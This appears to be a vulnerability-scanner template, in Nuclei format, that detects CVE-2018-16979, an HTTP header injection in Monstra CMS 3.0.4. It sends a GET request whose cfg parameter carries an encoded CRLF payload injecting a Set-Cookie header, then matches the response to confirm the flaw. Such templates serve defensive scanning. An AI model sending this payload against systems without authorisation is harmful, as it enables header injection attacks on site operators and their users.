id: CVE-2018-16979 info: name: Monstra CMS V3.0.4 - HTTP Header Injection author: 0x_Akoko severity: medium description: | Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. reference: - https://github.com/howchen/howchen/issues/4 - https://nvd.nist.gov/vuln/detail/CVE-2018-16979 classification: cve-id: CVE-2018-16979 metadata: verified: true tags: cve,cve2018,crlf,mostra,mostracms,cms requests: - method: GET path: - "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1" matchers-condition: and matchers: - type: word part: body words: - 'new line detected in' - 'cryptographp.php' condition: and - type: status status: - 200